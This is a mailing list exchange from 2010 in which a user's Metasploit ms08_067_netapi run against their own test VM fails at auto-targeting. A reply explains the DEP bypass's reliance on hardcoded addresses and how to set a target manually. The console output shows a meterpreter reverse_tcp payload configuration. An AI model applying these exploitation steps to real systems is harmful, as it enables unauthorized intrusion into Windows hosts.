Metasploit mailing list archives

Re: ms08_067
From: David Kennedy <kennedyd013 () gmail com>
Date: Wed, 2 Jun 2010 13:02:05 -0400

Based on the exploit and the way it bypasses data execution prevention
(DEP), it is very much reliant on hardcoded memory addresses. If
Metasploit isn't 100 percent certain it's a specific version, it will not
exploit the system. In order to force targeting, type 'show targets' and 'set
target <number>' and re-run the exploit.

On Wed, Jun 2, 2010 at 12:59 PM, Craig Freyman <craigfreyman () gmail com> wrote:

I have a VM that is vulnerable to ms08_067 but the exploit gives me this:

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2+ - lang:English
[-] Could not determine the exact service pack
[*] Auto-targeting failed, use 'show targets' to manually select one
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) > version
Framework: 3.4.1-dev.9325
Console  : 3.4.1-dev.9372

 msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST  yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER,

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread,
   LHOST  yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

Any ideas?


